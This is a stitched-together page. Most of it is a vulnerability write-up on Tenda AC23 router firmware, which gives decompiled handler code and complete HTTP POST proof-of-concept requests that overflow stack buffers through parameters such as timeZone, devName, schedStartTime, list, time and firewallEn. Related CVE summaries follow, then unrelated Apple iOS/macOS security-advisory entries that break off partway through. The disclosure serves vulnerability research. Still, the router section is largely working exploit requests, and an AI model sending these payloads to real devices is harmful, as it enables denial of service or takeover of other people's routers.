Tenda AC23 V16.03.07.45_cn was discovered to contain a stack overflow via the wpapsk_crypto parameter in the fromSetWirelessRepeat function.

**ac23**

版本信息：V16.03.07.45\_cn

**fromSetSysTime→sub\_496104→strcpy((char \*)v6, s);**

if ( !strcmp(v20, "sync") )
  {
    v19 = sub\_496104(a1);
    v14 = sub\_4C9C40(v19);
  }

int \_\_fastcall sub\_496104(int a1)
{
  int v2; // \[sp+1Ch\] \[+1Ch\]
  int v3; // \[sp+20h\] \[+20h\]
  char \*s; // \[sp+24h\] \[+24h\]
  int v5; // \[sp+28h\] \[+28h\]
  \_\_int16 v6\[8\]; // \[sp+2Ch\] \[+2Ch\] BYREF
  \_WORD v7\[8\]; // \[sp+3Ch\] \[+3Ch\] BYREF
  int v8\[2\]; // \[sp+4Ch\] \[+4Ch\] BYREF
  int v9\[5\]; // \[sp+54h\] \[+54h\] BYREF

  v5 = 0;
  v6\[0\] = 48;
  v6\[1\] = 0;
  v6\[2\] = 0;
  v6\[3\] = 0;
  v6\[4\] = 0;
  v6\[5\] = 0;
  v6\[6\] = 0;
  v6\[7\] = 0;
  strcpy((char \*)v7, "0");
  v7\[1\] = 0;
  v7\[2\] = 0;
  v7\[3\] = 0;
  v7\[4\] = 0;
  v7\[5\] = 0;
  v7\[6\] = 0;
  v7\[7\] = 0;
  v8\[0\] = 0;
  v8\[1\] = 0;
  v9\[0\] = 0;
  v9\[1\] = 0;
  v9\[2\] = 0;
  v9\[3\] = 0;
  s = (char \*)websGetVar(a1, "timeZone", &unk\_4DDAE4);
  v3 = websGetVar(a1, "timePeriod", &unk\_4DDAE4);
  v2 = websGetVar(a1, "ntpServer", "time.windows.com");
  if ( strchr(s, ':') )
  {
    sscanf(s, "%\[^:\]:%s", v6, v7);//stack overflow
  }
  else
  {
    strcpy((char \*)v6, s);
    strcpy((char \*)v7, "0");
  }
  SetValue("sys.timesyn", "1");
  SetValue("sys.timemode", "auto");
  SetValue("sys.timezone", v6);
  SetValue("sys.timenextzone", v7);
  SetValue("sys.timefixper", v3);
  SetValue("sys.timentpserver", v2);
  if ( !CommitCfm() )
    return 1;
  GetValue("sys.timesyn", v8);
  if ( atoi((const char \*)v8) == 1 )
    sprintf((char \*)v9, "op=%d", 3);
  else
    sprintf((char \*)v9, "op=%d", 2);
  send\_msg\_to\_netctrl(24, v9);
  return v5;
}

**poc**

POST /goform/SetSysTimeCfg HTTP/1.1
Host: 192.168.0.1
Content-Length: 787
Accept: \*/\*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.0.1
Referer: http://192.168.0.1/system\_time.html?random=0.6878395284342707&
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: password=1bbd886460827015e5d605ed44252251mzhcvb
Connection: close

timeType=sync&timePeriod=86400&ntpServer=time.windows.com&timeZone=aa:aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa&time=2000-01-01%2023%3A39%3A00

**formSetDeviceName→set\_device\_name→sprintf(v4, "%s;1", a1);**

int \_\_fastcall formSetDeviceName(int a1)
{
  int result; // $v0
  int v2; // \[sp+18h\] \[+18h\]
  const char \*v3; // \[sp+1Ch\] \[+1Ch\]
  const char \*v4; // \[sp+20h\] \[+20h\]
  int v5\[9\]; // \[sp+24h\] \[+24h\] BYREF

  v5\[0\] = 0;
  v5\[1\] = 0;
  v5\[2\] = 0;
  v5\[3\] = 0;
  v5\[4\] = 0;
  v5\[5\] = 0;
  v5\[6\] = 0;
  v5\[7\] = 0;
  v2 = 0;
  v4 = (const char \*)websGetVar(a1, "mac", &unk\_4DEB84);
  v3 = (const char \*)websGetVar(a1, "devName", &unk\_4DEB84);
  if ( set\_device\_name(v3, v4) )//stack\_overflow
  {
    sprintf((char \*)v5, "{\\"errCode\\":%d}", 1);
    result = websTransfer(a1, (const char \*)v5);
  }
  else
  {
    if ( !CommitCfm() )
      v2 = 1;
    sprintf((char \*)v5, "{\\"errCode\\":%d}", v2);
    result = websTransfer(a1, (const char \*)v5);
  }
  return result;
}

set\_device\_name

sprintf(v3, "client.devicename%s", (const char \*)v5);
sprintf(v4, "%s;1", a1);
SetValue(v3, v4);

**poc**

POST /goform/SetOnlineDevName HTTP/1.1
Host: 192.168.0.1
Content-Length: 264
Accept: \*/\*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.0.1
Referer: http://192.168.0.1/system\_time.html?random=0.9865714904007963&
Accept-Encoding: gzip, deflate
Accept-Language: en,zh-CN;q=0.9,zh;q=0.8
Connection: close

mac=9c:fc:e8:da:9c:5b&devName=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa

**setSchedWifi→ strcpy((char \*)ptr + 2, v8)**

int \_\_fastcall setSchedWifi(int a1)
{
  int v1; // $v0
  void \*ptr; // \[sp+30h\] \[+30h\]
  int i; // \[sp+34h\] \[+34h\]
  char \*s; // \[sp+38h\] \[+38h\]
  char \*nptr; // \[sp+3Ch\] \[+3Ch\]
  const char \*v7; // \[sp+40h\] \[+40h\]
  const char \*v8; // \[sp+44h\] \[+44h\]
  char \*v9; // \[sp+48h\] \[+48h\]
  int v10; // \[sp+4Ch\] \[+4Ch\]
  int v11; // \[sp+50h\] \[+50h\]
  int v12\[2\]; // \[sp+54h\] \[+54h\] BYREF
  int v13; // \[sp+5Ch\] \[+5Ch\] BYREF
  int v14; // \[sp+60h\] \[+60h\] BYREF
  int v15; // \[sp+64h\] \[+64h\] BYREF
  int v16; // \[sp+68h\] \[+68h\] BYREF
  int v17; // \[sp+6Ch\] \[+6Ch\] BYREF
  int v18; // \[sp+70h\] \[+70h\] BYREF
  int v19; // \[sp+74h\] \[+74h\] BYREF
  char v20\[256\]; // \[sp+78h\] \[+78h\] BYREF
  char v21\[256\]; // \[sp+178h\] \[+178h\] BYREF

  v11 = 1;
  v10 = 1;
  v12\[0\] = 0;
  v12\[1\] = 0;
  v13 = 1;
  v14 = 1;
  v15 = 1;
  v16 = 1;
  v17 = 1;
  v18 = 1;
  v19 = 1;
  i = 0;
  memset(v20, 0, sizeof(v20));
  memset(v21, 0, sizeof(v21));
  v9 = (char \*)websGetVar(a1, "schedWifiEnable", "1");
  v8 = (const char \*)websGetVar(a1, "schedStartTime", &unk\_4D7C58);
  v7 = (const char \*)websGetVar(a1, "schedEndTime", &unk\_4D7C58);
  nptr = (char \*)websGetVar(a1, "timeType", "0");
  s = (char \*)websGetVar(a1, "day", "1,1,1,1,1,1,1");
  v1 = wifi\_get\_mibname("wlan", "enable", v20);
  GetValue(v1, v12);
  if ( !LOBYTE(v12\[0\]) )
    strcpy((char \*)v12, "1");
  if ( atoi(nptr) )
    sscanf(s, "%d,%d,%d,%d,%d,%d,%d", &v13, &v14, &v15, &v16, &v17, &v18, &v19);
  SetValue("sys.sched.wifi.timeType", nptr);
  ptr = malloc(0x19u);
  v10 = atoi(v9);
  if ( ptr )
  {
    \*(\_BYTE \*)ptr = atoi((const char \*)v12) != 0;
    \*((\_BYTE \*)ptr + 1) = atoi(v9) != 0;
    strcpy((char \*)ptr + 2, v8);
    strcpy((char \*)ptr + 10, v7);
    for ( i = 0; i < 7; ++i )
      \*((\_BYTE \*)ptr + i + 18) = \*(&v13 + i) != 0;
    sub\_461D5C(ptr, 0);
    free(ptr);
    v11 = 0;
  }
  CommitCfm();
  if ( v10 )
  {
    sprintf(v21, "op=%d", 1);
    send\_msg\_to\_netctrl(62, v21);
    v11 = 0;
  }
  websWrite(
    a1,
    "HTTP/1.1 200 OK\\nContent-type: text/plain; charset=utf-8\\nPragma: no-cache\\nCache-Control: no-cache\\n\\n");
  websWrite(a1, "{\\"errCode\\":%d}", v11);
  return websDone(a1, 200);
}

**poc**

POST /goform/openSchedWifi HTTP/1.1
Host: 192.168.0.1
Content-Length: 102
Accept: \*/\*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.0.1
Referer: http://192.168.0.1/wifi\_time.html?random=0.05230918147386965&
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: password=1bbd886460827015e5d605ed44252251aoccvb
Connection: close

schedWifiEnable=1&schedStartTime=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa&schedEndTime=07%3A00&timeType=1&day=1%2C1%2C1%2C1%2C1%2C0%2C0

**fromSetWirelessRepeat→sub\_45CD64→sub\_45CAD8→sub\_45BB10**

if ( strcmp(v14, "none") )
  {
    if ( strcmp(v14, "wpapsk") )
      return -1;
    v13 = (char \*)websGetVar(a1, "wpapsk\_type", "wpa&wpa2");
    v12 = (char \*)websGetVar(a1, "wpapsk\_crypto", "aes");
    s = (char \*)websGetVar(a1, "wpapsk\_key", &unk\_4D72FC);
    if ( !\*s && strlen(s) < 8 )
      return -1;
    if ( !strcmp(v13, "wpa") )
    {
      strcpy(v20, "psk");
    }
    else if ( !strcmp(v13, "wpa2") )
    {
      strcpy(v20, "psk2");
    }
    else
    {
      strcpy(v20, "psk+psk2");
    }
    if ( !strcmp(v12, "tkip&aes") )
      strcpy(v21, "tkip+aes");
    else
      strcpy(v21, v12);
    v6 = wifi\_get\_mibname(a3, "extend\_wpapsk\_type", v18);
    SetValue(v6, v20);
    v7 = wifi\_get\_mibname(a3, "extend\_wpapsk\_crypto", v18);
    SetValue(v7, v21);
    v8 = wifi\_get\_mibname(a3, "extend\_wpapsk\_key", v18);
    SetValue(v8, s);
  }

**poc**

POST /goform/WifiExtraSet HTTP/1.1
Host: 192.168.0.1
Content-Length: 247
Accept: \*/\*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.0.1
Referer: http://192.168.0.1/wifi\_time.html?random=0.05230918147386965&
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: password=1bbd886460827015e5d605ed44252251fsacvb
Connection: close

wifi\_chkHz=1&wl\_mode=wisp&wl\_enbale=1&country\_code=CN&wpsEn=0&guestEn=0&iptvEn=0&wifiTimerEn=1&smartSaveEn=1&dmzEn=1&handset=0&ssid=fcniux&wpapsk\_key=11111111&security=wpapsk&wpapsk\_type=wpa&wpapsk\_crypto=aaaaaaaaaaaaaaaaaaaaaaaaaaaa&mac=undifined

**fromSetWifiGusetBasic**

\_\_src = (char \*)websGetVar(param\_1,"shareSpeed",&DAT\_004d83a0);
  strcpy((char \*)&local\_124,\_\_src);

**poc**

POST /goform/WifiGuestSet HTTP/1.1
Host: 192.168.0.1
Content-Length: 531
Accept: \*/\*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.0.1
Referer: http://192.168.0.1/main.html
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: password=1bbd886460827015e5d605ed44252251tyacvb
Connection: close

guestEn=1&guestEn\_5g=1&guestSecurity=wpapsk&guestSecurity\_5g=wpapsk&guestSsid=Tenda\_VIP&guestSsid\_5g=Tenda\_VIP\_5G&guestWrlPwd=11111111&guestWrlPwd\_5g=11111111&effectiveTime=8&shareSpeed=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa

**formSetQosBand**

formSetQosBand→set\_qosMib\_list→strcpy(v8, s);

int \_\_fastcall formSetQosBand(int a1)
{
int v2; // \[sp+30h\] \[+30h\]
int v3\[8\]; // \[sp+34h\] \[+34h\] BYREF
char v4\[256\]; // \[sp+54h\] \[+54h\] BYREF
int v5\[8\]; // \[sp+154h\] \[+154h\] BYREF
int v6\[8\]; // \[sp+174h\] \[+174h\] BYREF
int v7\[5\]; // \[sp+194h\] \[+194h\] BYREF

v3\[0\] = 0;
v3\[1\] = 0;
v3\[2\] = 0;
v3\[3\] = 0;
v3\[4\] = 0;
v3\[5\] = 0;
v3\[6\] = 0;
v3\[7\] = 0;
memset(v4, 0, sizeof(v4));
v2 = websGetVar(a1, "list", &unk\_4DEB84);
unSetQosOldMiblist();
set\_qosoldMib\_list();
unSetQosMiblist();
set\_qosMib\_list(v2, 10);

int \_\_fastcall set\_qosMib\_list(const char \*a1, char a2)
{
  char \*v2; // $v0
  char \*s; // \[sp+24h\] \[+24h\]
  const char \*v5; // \[sp+28h\] \[+28h\]
  int v6; // \[sp+2Ch\] \[+2Ch\]
  int v7; // \[sp+30h\] \[+30h\] BYREF
  char v8\[256\]; // \[sp+34h\] \[+34h\] BYREF
  int v9; // \[sp+134h\] \[+134h\] BYREF
  int v10; // \[sp+138h\] \[+138h\]
  int v11\[8\]; // \[sp+13Ch\] \[+13Ch\] BYREF
  int v12\[4\]; // \[sp+15Ch\] \[+15Ch\] BYREF
  int v13\[4\]; // \[sp+16Ch\] \[+16Ch\] BYREF
  char v14\[256\]; // \[sp+17Ch\] \[+17Ch\] BYREF
  int v15; // \[sp+27Ch\] \[+27Ch\]
  int v16; // \[sp+280h\] \[+280h\]
  int v17; // \[sp+284h\] \[+284h\]
  int v18; // \[sp+288h\] \[+288h\]

  v7 = 0;
  memset(v8, 0, sizeof(v8));
  v9 = 0;
  v10 = 0;
  v11\[0\] = 0;
  v11\[1\] = 0;
  v11\[2\] = 0;
  v11\[3\] = 0;
  v11\[4\] = 0;
  v11\[5\] = 0;
  v11\[6\] = 0;
  v11\[7\] = 0;
  v12\[0\] = 0;
  v12\[1\] = 0;
  v12\[2\] = 0;
  v12\[3\] = 0;
  v13\[0\] = 0;
  v13\[1\] = 0;
  v13\[2\] = 0;
  v13\[3\] = 0;
  memset(v14, 0, sizeof(v14));
  s = (char \*)a1;
  v2 = strchr(a1, a2);
  while ( v2 )
  {
    v6 = 0;
    \*v2 = 0;
    v5 = v2 + 1;
    memset(v8, 0, sizeof(v8));
    strcpy(v8, s);
    if ( v8\[0\] == 59 )
    {
      sscanf(v8, ";%\[^;\];%\[^;\];%\[^;\];%\[^;\];", &v9, v11, v13, v12);
    }
    else
    {
      sscanf(v8, "%\[^\\r\]\\r%\[^\\r\]\\r%\[^\\r\]\\r%s", v14, v11, v13, v12);
      v6 = 1;
    }
    if ( atoi((const char \*)v13) || atoi((const char \*)v12) )
    {
      if ( v6 == 1 )
        set\_device\_name(v14, v11);

这个参数长度不加以限制还会影响set\_device\_name

**poc**

POST /goform/SetNetControlList HTTP/1.1
Host: 192.168.0.1
Content-Length: 791
Accept: \*/\*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.0.1
Referer: http://192.168.0.1/net\_control.html?random=0.0444079600832199&
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: password=1bbd886460827015e5d605ed44252251aticvb
Connection: close

list=DESKTOP-V29RD1268aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa:77:24:54:a9:c000
Unknownaaaaaaaaaaaaaaaaaaaaaaaaaaaaunknown00

**setSmartPowerManagement**

    nptr = (char \*)websGetVar(a1, "powerSavingEn", "0");
  s = (char \*)websGetVar(a1, "time", "00:00-7:30");
  v4 = websGetVar(a1, "powerSaveDelay", "1");
  v3 = (char \*)websGetVar(a1, "ledCloseType", "allClose");
  if ( nptr && s && v4 && v3 )
  {
    sscanf(s, "%\[^:\]:%\[^-\]-%\[^:\]:%s", v7, v8, v9, v10);
    sprintf(v11, "%s:%s", (const char \*)v7, (const char \*)v8);
    sprintf(v12, "%s:%s", (const char \*)v9, (const char \*)v10);
    GetValue("sys.sched.led.closetype", v13);

**poc**

POST /goform/PowerSaveSet HTTP/1.1
Host: 192.168.0.1
Content-Length: 803
Accept: \*/\*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.0.1
Referer: http://192.168.0.1/sleep\_mode.html?random=0.7222154127483253&
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: password=1bbd886460827015e5d605ed44252251csvcvb
Connection: close

powerSavingEn=1&time=0aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa0%3A00-07%3A00&ledCloseType=allClose&powerSaveDelay=1

**formSetFirewallCfg**

int \_\_fastcall formSetFirewallCfg(int a1)
{
  int v1; // $a1
  int v2; // $a2
  \_BOOL4 v4; // \[sp+20h\] \[+20h\]
  char \*s; // \[sp+24h\] \[+24h\]
  int v6\[2\]; // \[sp+28h\] \[+28h\] BYREF
  char v7\[64\]; // \[sp+30h\] \[+30h\] BYREF
  int v8\[2\]; // \[sp+70h\] \[+70h\] BYREF
  char v9\[64\]; // \[sp+78h\] \[+78h\] BYREF

  v6\[0\] = 0;
  v6\[1\] = 0;
  memset(v7, 0, sizeof(v7));
  v8\[0\] = 0;
  v8\[1\] = 0;
  memset(v9, 0, sizeof(v9));
  s = (char \*)websGetVar(a1, "firewallEn", "1111");
  if ( strlen(s) \>\= 4 )
  {
    strcpy((char \*)v6, s);

**poc**

POST /goform/SetFirewallCfg HTTP/1.1
Host: 192.168.0.1
Content-Length: 764
Accept: \*/\*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.0.1
Referer: http://192.168.0.1/firewall.html?random=0.3855955678045606&
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: password=1bbd886460827015e5d605ed44252251izccvb
Connection: close

firewallEn=111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111

CVE-2022-43104: IOT_FIRMWARE/ac23.md at main · ppcrab/IOT_FIRMWARE

Tenda AC23 V16.03.07.45_cn was discovered to contain a stack overflow via the devName parameter in the formSetDeviceName function.

CVE-2022-43101: IOT_FIRMWARE/ac23.md at main · ppcrab/IOT_FIRMWARE

Tenda AC23 V16.03.07.45_cn was discovered to contain a stack overflow via the timeZone parameter in the fromSetSysTime function.

CVE-2022-43102: IOT_FIRMWARE/ac23.md at main · ppcrab/IOT_FIRMWARE

Tenda AC23 V16.03.07.45_cn was discovered to contain a stack overflow via the schedStartTime parameter in the setSchedWifi function.

CVE-2022-43106: IOT_FIRMWARE/ac23.md at main · ppcrab/IOT_FIRMWARE

Tenda AC23 V16.03.07.45_cn was discovered to contain a stack overflow via the list parameter in the formSetQosBand function.

CVE-2022-43103: IOT_FIRMWARE/ac23.md at main · ppcrab/IOT_FIRMWARE

Tenda AC23 V16.03.07.45_cn was discovered to contain a stack overflow via the firewallEn parameter in the formSetFirewallCfg function.

CVE-2022-43108: IOT_FIRMWARE/ac23.md at main · ppcrab/IOT_FIRMWARE

Tenda AC23 V16.03.07.45_cn was discovered to contain a stack overflow via the time parameter in the setSmartPowerManagement function.

CVE-2022-43107: IOT_FIRMWARE/ac23.md at main · ppcrab/IOT_FIRMWARE

A memory corruption issue existed in the processing of ICC profiles. This issue was addressed with improved input validation. This issue is fixed in macOS Ventura 13. Processing a maliciously crafted image may lead to arbitrary code execution.

CVE-2022-26730: About the security content of macOS Ventura 13

This issue was addressed with improved entitlements. This issue is fixed in iOS 16.1 and iPadOS 16. An app may be able to record audio using a pair of connected AirPods.

Released October 24, 2022

**Apple Neural Engine**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, iPad mini 5th generation and later

Impact: An app may be able to execute arbitrary code with kernel privileges 

Description: The issue was addressed with improved memory handling. 

CVE-2022-32932: Mohamed Ghannam (@\_simo36)

Entry added October 27, 2022

**AppleMobileFileIntegrity**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, iPad mini 5th generation and later

Impact: An app may be able to modify protected parts of the file system

Description: This issue was addressed by removing additional entitlements.

CVE-2022-42825: Mickey Jin (@patch1t)

**Audio**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, iPad mini 5th generation and later

Impact: Parsing a maliciously crafted audio file may lead to disclosure of user information

Description: The issue was addressed with improved memory handling.

CVE-2022-42798: Anonymous working with Trend Micro Zero Day Initiative

Entry added October 27, 2022

**AVEVideoEncoder**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, iPad mini 5th generation and later

Impact: An app may be able to execute arbitrary code with kernel privileges

Description: The issue was addressed with improved bounds checks.

CVE-2022-32940: ABC Research s.r.o.

**Backup**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, iPad mini 5th generation and later

Impact: An app may be able to access iOS backups

Description: A permissions issue was addressed with additional restrictions. 

CVE-2022-32929: Csaba Fitzl (@theevilbit) of Offensive Security

Entry added October 27, 2022

**CFNetwork**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, iPad mini 5th generation and later

Impact: Processing a maliciously crafted certificate may lead to arbitrary code execution

Description: A certificate validation issue existed in the handling of WKWebView. This issue was addressed with improved validation.

CVE-2022-42813: Jonathan Zhang of Open Computing Facility (ocf.berkeley.edu)

**Core Bluetooth**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, iPad mini 5th generation and later

Impact: An app may be able to record audio using a pair of connected AirPods

Description: This issue was addressed with improved entitlements.

CVE-2022-32946: Guilherme Rambo of Best Buddy Apps (rambo.codes)

**FaceTime**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, iPad mini 5th generation and later

Impact: A user may be able to view restricted content from the lock screen 

Description: A lock screen issue was addressed with improved state management. 

CVE-2022-32935: Bistrit Dahal

Entry added October 27, 2022

**GPU Drivers**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, iPad mini 5th generation and later

Impact: An app may be able to execute arbitrary code with kernel privileges

Description: The issue was addressed with improved memory handling.

CVE-2022-32947: Asahi Lina (@LinaAsahi)

**Graphics Driver**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, iPad mini 5th generation and later

Impact: An app may be able to execute arbitrary code with kernel privileges 

Description: The issue was addressed with improved bounds checks. 

CVE-2022-32939: Willy R. Vasquez of The University of Texas at Austin

Entry added October 27, 2022

**IOHIDFamily**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, iPad mini 5th generation and later

Impact: An app may cause unexpected app termination or arbitrary code execution

